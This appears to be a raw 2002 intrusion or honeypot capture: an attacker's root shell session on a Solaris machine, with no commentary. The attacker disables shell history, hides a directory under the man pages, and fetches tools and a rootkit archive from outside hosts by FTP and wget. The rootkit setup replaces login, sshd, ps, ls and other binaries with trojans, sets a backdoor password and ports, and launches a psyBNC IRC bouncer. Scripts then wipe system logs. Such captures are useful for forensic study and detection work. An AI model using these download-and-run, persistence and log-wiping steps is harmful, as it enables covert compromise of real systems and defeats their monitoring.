29/11/2002 15:36:25 61.219.90.180 -> 192.168.100.28 TCP 56709->1524

29/11/2002 15:36:37 61.219.90.180 -> 192.168.100.28 TCP 56712->1524

# uname -a;ls -l /core /var/dt/tmp/DTSPCD.log;PATH=/usr/local/bin:/usr/bin:/bin:/usr/sbin:/sbin:/usr/ccs/bin:/usr/gnu/bin;export PATH;echo "BD PID(s): "`ps -fed|grep ' -s /tmp/x'|grep -v grep|awk '{print $2}'`
SunOS zoberius 5.8 Generic_108528-09 sun4u sparc SUNW,Ultra-5_10
/core: No such file or directory
/var/dt/tmp/DTSPCD.log: No such file or directory
BD PID(s): 1773
#
wget
wget: not found
#
w
9:44am up 13 day(s), 4:24, 0 users, load average: 0.00, 0.00, 0.01
User tty login@ idle JCPU PCPU what
#
/bin/sh -i
unset HISTFILE
# unset DISPLAY
mkdir /usr/share/man/man1/.old
cd /usr/share/man/man1/.old
# # # ftp 62.211.66.16 21
bobzz
ftp: ioctl(TIOCGETP): Invalid argument
Password:
joka

get wget
get dlp
get solbnc
get iupv6sun
Name (62.211.66.16:root): iupv6sun: No such file or directory.
get ipv6sun
quit
# ls
dlp
ipv6sun
solbnc
wget
#
chmod +x solbnc wget dlp
# ./wget
wget: missing URL
Usage: wget [OPTION]... [URL]...

Try `wget --help' for more options.
#
./wget http://62.211.66.53/bobzz/sol.tar.gz
--09:47:58-- http://62.211.66.53:80/bobzz/sol.tar.gz
=> `sol.tar.gz'
Connecting to 62.211.66.53:80... connected!
HTTP request sent, awaiting response... 200 OK
Length: 1,884,160 [application/x-tar]

0K -> .......... .......... .......... .......... .......... [ 2%]
50K -> .......... .......... .......... .......... .......... [ 5%]
100K -> .......... .......... .......... .......... .......... [ 8%]
150K -> .......... .......... .......... .......... .......... [ 10%]
200K -> .......... .......... .......... .......... .......... [ 13%]
250K -> .......... .......... .......... .......... .......... [ 16%]
300K -> .......... .......... .......... .......... .......... [ 19%]
350K -> .......... .......... .......... .......... .......... [ 21%]
400K -> .......... .......... .......... .......... .......... [ 24%]
450K -> .......... .......... .......... .......... .......... [ 27%]
500K -> .......... .......... .......... .......... .......... [ 29%]
550K -> .......... .......... .......... .......... .......... [ 32%]
600K -> .......... .......... .......... .......... .......... [ 35%]
650K -> .......... .......... .......... .......... .......... [ 38%]
700K -> .......... .......... .......... .......... .......... [ 40%]
750K -> .......... .......... .......... .......... .......... [ 43%]
800K -> .......... .......... .......... .......... .......... [ 46%]
850K -> .......... .......... .......... .......... .......... [ 48%]
900K -> .......... .......... .......... .......... .......... [ 51%]
950K -> .......... .......... .......... .......... .......... [ 54%]
1000K -> .......... .......... .......... .......... .......... [ 57%]
1050K -> .......... .......... .......... .......... .......... [ 59%]
1100K -> .......... .......... .......... .......... .......... [ 62%]
1150K -> .......... .......... .......... .......... .......... [ 65%]
1200K -> .......... .......... .......... .......... .......... [ 67%]
1250K -> .......... .......... .......... .......... .......... [ 70%]
1300K -> .......... .......... .......... .......... .......... [ 73%]
1350K -> .......... .......... .......... .......... .......... [ 76%]
1400K -> .......... .......... .......... .......... .......... [ 78%]
1450K -> .......... .......... .......... .......... .......... [ 81%]
1500K -> .......... .......... .......... .......... .......... [ 84%]
1550K -> .......... .......... .......... .......... .......... [ 86%]
1600K -> .......... .......... .......... .......... .......... [ 89%]
1650K -> .......... .......... .......... .......... .......... [ 92%]
1700K -> .......... .......... .......... .......... .......... [ 95%]
1750K -> .......... .......... .......... .......... .......... [ 97%]
1800K -> .......... .......... .......... .......... [100%]

09:55:09 (4.27 KB/s) - `sol.tar.gz' saved [1884160/1884160]

#
rrrrrretar -xf sol.tar.gz
rrrrrretar: not found
#
cd sol
sol: does not exist
#
./setup
./setup: not found
#
cd sol
sol: does not exist
#
tar -xf sol.tar.gz
# cd sol
# ./setup
[0;36mbobz oN ircNet on join #privè
No such file or directory
/var/log/cron.2: No such file or directory
/var/log/cron.3: No such file or directory
/var/log/cron.4: No such file or directory
/var/log/lastlog: No such file or directory
/var/log/xferlog: No such file or directory
/var/log/xferlog.1: No such file or directory
/var/log/xferlog.2: No such file or directory
/var/log/xferlog.3: No such file or directory
/var/log/xferlog.4: No such file or directory
/var/log/wtmp: No such file or directory
/var/log/wtmp.1: No such file or directory
/var/log/spooler: No such file or directory
/var/log/spooler.1: No such file or directory
/var/log/spooler.2: No such file or directory
/var/log/spooler.3: No such file or directory
/var/log/spooler.4: No such file or directory
---
LogZ Cancellati...
Delete LogZ by warning
[1;37m*[0;37m Starting up at: [0;36m1038585350[0;37m
[1;37m*[0;37m Installing from /usr/share/man/man1/.old/sol - Will erase /usr/share/man/man1/.old/sol after install
[1;37m*[0;37m Checking for existing rootkits..
* Checking for existing rootkits..
* checking /etc/rc2 and /etc/rc3 for rootkits...
* Rootkits Removed from config files
* checking crond configs for rootkits...
* Rootkits Removed from crond config files
*** WARNING *** 2 suspicious files found in /dev
[1;37m***[0;37m Insert Rootkit Password :
mixer
[1;37m***[0;37m Using Password mixer
[1;37m***[0;37m Insert Rootkit SSH Port :
5001
[1;37m***[0;37m Using Port 5001
[1;37m***[0;37m Insert Rootkit PsyBNC Port :
7000
[1;37m***[0;37m Using Port 7000
File processed...
[1;37m*[0;37m Making backups... su ping du passwd find ls netstat strings ps Done.
[1;37m*[0;37m Installing trojans... login sshd netstat ls find strings du passwd ping su Complete.
[1;37m*[0;37m Suid removal at atq atrm eject fdformat rdist rdist admintool ufsdump ufsrestore quota ff.core lpset lpstat netpr arp chkperm Complete.
[1;37m*[0;37m Starting Patcher...
* Patching...
DTSCD PATCHED
LPD PATCHED
fingerd
cmsd
ttdbserverd
sadmind
statd
rquotad
rusersd
cachefsd
bindshells
snmpXdmid
Done.

--09:56:21-- ftp://sunsolve.sun.com:21/pub/patches/111085-02.zip
=> `111085-02.zip'
Connecting to sunsolve.sun.com:21... connected!
Logging in as anonymous ... Logged in!
==> TYPE I ... done. ==> CWD pub/patches ... done.
==> PORT ... done. ==> RETR 111085-02.zip ... done.
Length: 27,300 (unauthoritative)

0K -> .......... .......... ...... [100%]

09:56:45 (1.83 KB/s) - `111085-02.zip' saved [27300]

Archive: 111085-02.zip
creating: 111085-02/
inflating: 111085-02/.diPatch
creating: 111085-02/SUNWcsu/
inflating: 111085-02/SUNWcsu/pkgmap
inflating: 111085-02/SUNWcsu/pkginfo
creating: 111085-02/SUNWcsu/install/
inflating: 111085-02/SUNWcsu/install/checkinstall
inflating: 111085-02/SUNWcsu/install/copyright
inflating: 111085-02/SUNWcsu/install/i.none
inflating: 111085-02/SUNWcsu/install/patch_checkinstall
inflating: 111085-02/SUNWcsu/install/patch_postinstall
inflating: 111085-02/SUNWcsu/install/postinstall
inflating: 111085-02/SUNWcsu/install/preinstall
creating: 111085-02/SUNWcsu/reloc/
creating: 111085-02/SUNWcsu/reloc/usr/
creating: 111085-02/SUNWcsu/reloc/usr/bin/
inflating: 111085-02/SUNWcsu/reloc/usr/bin/login
inflating: 111085-02/README.111085-02
Copyright 2001 Sun Microsystems, Inc. All rights reserved.

This appears to be an attempt to install the same architecture and
version of a package which is already installed. This installation
will attempt to overwrite this package.

PaTcH_MsG 2 Patch number 111085-02 is already applied.

Installation of <SUNWcsu> was suspended (administration).
No changes were made to the system.
--09:56:49-- ftp://sunsolve.sun.com:21/pub/patches/108949-07.zip
=> `108949-07.zip'
Connecting to sunsolve.sun.com:21... connected!
Logging in as anonymous ... Logged in!
==> TYPE I ... done. ==> CWD pub/patches ... done.
==> PORT ... done. ==> RETR 108949-07.zip ... done.
Length: 1,033,092 (unauthoritative)

0K -> .......... .......... .......... .......... .......... [ 4%]
50K -> .......... .......... .......... .......... .......... [ 9%]
100K -> .......... .......... .......... .......... .......... [ 14%]
150K -> .......... .......... .......... .......... .......... [ 19%]
200K -> .......... .......... .......... .......... .......... [ 24%]
250K -> .......... .......... .......... .......... .......... [ 29%]
300K -> .......... .......... .......... .......... .......... [ 34%]
350K -> .......... .......... .......... .......... .......... [ 39%]
400K -> .......... .......... .......... .......... .......... [ 44%]
450K -> .......... .......... .......... .......... .......... [ 49%]
500K -> .......... .......... .......... .......... .......... [ 54%]
550K -> .......... .......... .......... .......... .......... [ 59%]
600K -> .......... .......... .......... .......... .......... [ 64%]
650K -> .......... .......... .......... .......... .......... [ 69%]
700K -> .......... .......... .......... .......... .......... [ 74%]
750K -> .......... .......... .......... .......... .......... [ 79%]
800K -> .......... .......... .......... .......... .......... [ 84%]
850K -> .......... .......... .......... .......... .......... [ 89%]
900K -> .......... .......... .......... .......... .......... [ 94%]
950K -> .......... .......... .......... .......... .......... [ 99%]
1000K -> ........ [100%]

10:01:00 (4.20 KB/s) - `108949-07.zip' saved [1033092]

Archive: 108949-07.zip
creating: 108949-07/
inflating: 108949-07/.diPatch
inflating: 108949-07/postbackout
creating: 108949-07/SUNWdtbas/
inflating: 108949-07/SUNWdtbas/pkgmap
inflating: 108949-07/SUNWdtbas/pkginfo
creating: 108949-07/SUNWdtbas/install/
inflating: 108949-07/SUNWdtbas/install/checkinstall
inflating: 108949-07/SUNWdtbas/install/copyright
inflating: 108949-07/SUNWdtbas/install/depend
inflating: 108949-07/SUNWdtbas/install/i.none
inflating: 108949-07/SUNWdtbas/install/patch_checkinstall
inflating: 108949-07/SUNWdtbas/install/patch_postinstall
inflating: 108949-07/SUNWdtbas/install/postinstall
inflating: 108949-07/SUNWdtbas/install/preinstall
creating: 108949-07/SUNWdtbas/reloc/
creating: 108949-07/SUNWdtbas/reloc/dt/
creating: 108949-07/SUNWdtbas/reloc/dt/lib/
inflating: 108949-07/SUNWdtbas/reloc/dt/lib/libDtHelp.so.1
inflating: 108949-07/SUNWdtbas/reloc/dt/lib/libDtSvc.so.1
creating: 108949-07/SUNWdtbax/
inflating: 108949-07/SUNWdtbax/pkgmap
inflating: 108949-07/SUNWdtbax/pkginfo
creating: 108949-07/SUNWdtbax/install/
inflating: 108949-07/SUNWdtbax/install/checkinstall
inflating: 108949-07/SUNWdtbax/install/copyright
inflating: 108949-07/SUNWdtbax/install/depend
inflating: 108949-07/SUNWdtbax/install/i.none
inflating: 108949-07/SUNWdtbax/install/patch_checkinstall
inflating: 108949-07/SUNWdtbax/install/patch_postinstall
inflating: 108949-07/SUNWdtbax/install/postinstall
inflating: 108949-07/SUNWdtbax/install/preinstall
creating: 108949-07/SUNWdtbax/reloc/
creating: 108949-07/SUNWdtbax/reloc/dt/
creating: 108949-07/SUNWdtbax/reloc/dt/lib/
creating: 108949-07/SUNWdtbax/reloc/dt/lib/sparcv9/
inflating: 108949-07/SUNWdtbax/reloc/dt/lib/sparcv9/libDtHelp.so.1
inflating: 108949-07/SUNWdtbax/reloc/dt/lib/sparcv9/libDtSvc.so.1
inflating: 108949-07/postpatch
inflating: 108949-07/README.108949-07
Copyright 2001 Sun Microsystems, Inc. All rights reserved.

This appears to be an attempt to install the same architecture and
version of a package which is already installed. This installation
will attempt to overwrite this package.


Installation of <SUNWdtbas> was successful.
Copyright 2001 Sun Microsystems, Inc. All rights reserved.

This appears to be an attempt to install the same architecture and
version of a package which is already installed. This installation
will attempt to overwrite this package.


Installation of <SUNWdtbax> was successful.
Archive: 111606-02.zip
creating: 111606-02/
inflating: 111606-02/.diPatch
creating: 111606-02/SUNWftpu/
inflating: 111606-02/SUNWftpu/pkgmap
inflating: 111606-02/SUNWftpu/pkginfo
creating: 111606-02/SUNWftpu/install/
inflating: 111606-02/SUNWftpu/install/checkinstall
inflating: 111606-02/SUNWftpu/install/copyright
inflating: 111606-02/SUNWftpu/install/i.none
inflating: 111606-02/SUNWftpu/install/patch_checkinstall
inflating: 111606-02/SUNWftpu/install/patch_postinstall
inflating: 111606-02/SUNWftpu/install/postinstall
inflating: 111606-02/SUNWftpu/install/preinstall
creating: 111606-02/SUNWftpu/reloc/
creating: 111606-02/SUNWftpu/reloc/usr/
creating: 111606-02/SUNWftpu/reloc/usr/sbin/
inflating: 111606-02/SUNWftpu/reloc/usr/sbin/in.ftpd
inflating: 111606-02/README.111606-02
Copyright 2001 Sun Microsystems, Inc. All rights reserved.

This appears to be an attempt to install the same architecture and
version of a package which is already installed. This installation
will attempt to overwrite this package.


Installation of <SUNWftpu> was successful.
PS Trojaned[1;37m*[0;37m Primary network interface is of type: [0;36mhme[0;37m
[1;37m*[0;37m Copying utils.. passgen fixer wipe utime crt idstart ssh-dxe syn README Done.
[1;37m*[0;37m psyBNC has now been configured on port 7000 (default) with no IDENT
[1;37m*[0;37m erasing rootkit...
./setup: test: unknown operator 16
#
./startbnc
.-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-.
,----.,----.,-. ,-.,---.,--. ,-.,----.
| O || ,-' \ \/ / | o || \| || ,--'
| _/ _\ \ \ / | o< | |\ || |__
|_| |____/ |__| |___||_| \_| \___|
Version 2.2.1 (c) 1999-2000
the most psychoid
and the cool lam3rz Group IRCnet

`-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=tCl=-'
Configuration File: psybnc.conf
No logfile specified, logging to log/psybnc.log
Listening on: 0.0.0.0 port 7000
psyBNC2.2.1-cBtITLdDMSNp started (PID 3262)
./startbnc
^[[1;37m*^[[0;37m psyBNC installed - loaded on reboot :>
#
cd ..
# ./solbnc
# ./dlp
Delete LogZ by bobbino
-------
Deleting /var/log...
/var/log/secure: No such file or directory
/var/log/secure.1: No such file or directory
/var/log/secure.2: No such file or directory
/var/log/secure.3: No such file or directory
/var/log/secure.4: No such file or directory
/var/log/boot.log: No such file or directory
/var/log/boot.log.1: No such file or directory
/var/log/boot.log.2: No such file or directory
/var/log/boot.log.3: No such file or directory
/var/log/boot.log.4: No such file or directory
/var/log/cron: No such file or directory
/var/log/cron.1: No such file or directory
/var/log/cron.2: No such file or directory
/var/log/cron.3: No such file or directory
/var/log/cron.4: No such file or directory
/var/log/lastlog: No such file or directory
/var/log/xferlog: No such file or directory
/var/log/xferlog.1: No such file or directory
/var/log/xferlog.2: No such file or directory
/var/log/xferlog.3: No such file or directory
/var/log/xferlog.4: No such file or directory
/var/log/wtmp: No such file or directory
/var/log/wtmp.1: No such file or directory
/var/log/spooler: No such file or directory
/var/log/spooler.1: No such file or directory
/var/log/spooler.2: No such file or directory
/var/log/spooler.3: No such file or directory
/var/log/spooler.4: No such file or directory
---
LogZ Cancellati...
Delete LogZ by bobbino
root 167 1 0 Nov 16 ? 0:00 /usr/sbin/inetd -s
root 3325 3265 0 10:02:25 ? 0:00 grep inetd
---
Patch.....
Attivata by RyO
# #